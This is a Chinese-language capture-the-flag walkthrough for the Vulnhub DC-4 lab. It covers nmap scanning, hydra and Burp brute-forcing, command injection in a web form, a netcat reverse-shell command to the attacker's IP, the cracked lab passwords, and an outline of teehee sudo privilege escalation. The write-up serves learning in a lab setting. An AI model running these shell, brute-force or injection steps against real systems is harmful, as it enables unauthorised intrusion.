Vulnhub DC-4 teehee 提权

Vulnhub 之 DC-4

本文只用于学习知识，不要将其用于非法途径，

前言

DC已经做了一半了，前三次都是基于初学者的，这次的难度就提升了，适合初学者和入门的伙伴。

还是按照常例看看作者是怎么描述的吧。

下载地址

DC-4

描述

DC-4是另一个专门建造的脆弱实验室，目的是获得渗透测试领域的经验。
​
与以前的DC版本不同，这个版本主要是为初学者/中间用户设计的。只有一面旗帜，但技术上来说，有多个入口，就像上次一样，没有线索。
​
必须具备Linux技能和熟悉Linux命令行，就像一些基本渗透测试工具的经验一样。
​
对于初学者来说，谷歌可能会有很大的帮助，但是你可以随时在@DCAU7发推给我寻求帮助，让你重新开始。但是请注意:我不会给你答案，相反，我会给你一个如何前进的想法。

所以说，谷歌真的很万能。O(∩*∩)O哈哈~*

靶机环境

记得修改DC-4的网络为NAT模式

kali : 192.168.248.130
​DC-4 : 192.168.248.128

靶机复现

• 扫描网段

  nmap -sn 192.168.248.0/24

  

  发现目标ip ： 192.168.248.128

• 扫描端口

  nmap -sS 192.168.248.128

  

• 尝试爆破ssh

  hydra -l root -P /root/Desktop/weakpass.txt -t 5 ssh://192.168.248.128

  

  一般破解需要时间所以我就做一个演示

• 网站搜寻线索

  发现是一个登录框，

  

  并且没有登录限制，尝试爆破

  可以使用hydra爆破，这里我使用burp做测试

  设置为Cluster bomb,用户给admin和root ，密码采用弱口令字典这个网上挺多的，或者使用hydra的默认字典也可以，然后线程跑高点 ， 我这里给burp设置的20，大概不到一分钟就出来了。

这里只要登录成功后之后的登录都是636了

• 登录发现

  有三个命令可以运行，然后抓包查看发现可以在radio这块执行了系统命令，那么是否可以执行其他的命令

  

  尝试执行whoami

  

  既然可以执行一些简单的命令，我们就可以尝试去反弹shell

  命令：nc -e /bin/sh 192.168.248.130 4444

  

  获取交互模式

  命令：python -c 'import pty;pty.spawn("/bin/bash")'

  之后在home的jim目录下发现了一个旧密码的备份

  

  或许可以尝试用它去爆破ssh

  命令：chydra -L /root/Desktop/user.txt -P /root/Desktop/dc_pass.txt -t 5 ssh://192.168.248.128

  等待是漫长的，要有耐心

  终于出来了一个 用户名：jim 密码：jibril04
  

  切换到jim用户下，打开mbox查看

  

  有邮件，去mail下查看，发现了jim文件获取到jim的密码

  

• 登录charles

  密码： ^xHhA&hvim0y

  命令：sudo -l查看权限 发现可以不需要密码执行teehee

  百度得到提权方式

  1 通过teehee的sudo提升权限以 root身份写入crontab计划任务通过执行获取root权限

  

  2 还有个2呢，多个想法多个活路

  通过添加用户到passwd，设置其权限，之后su 访问即可获得root

  

  所以，最好不要给用户sudo权限，或者限制sudo权限的，这样才能保证网络安全

结束语

今天的靶机奉上各位看官，过程简单，主要掌握提权的思路和前期爆破的等待。

---

参考文章：
https://www.anquanke.com/post/id/178658#h3-4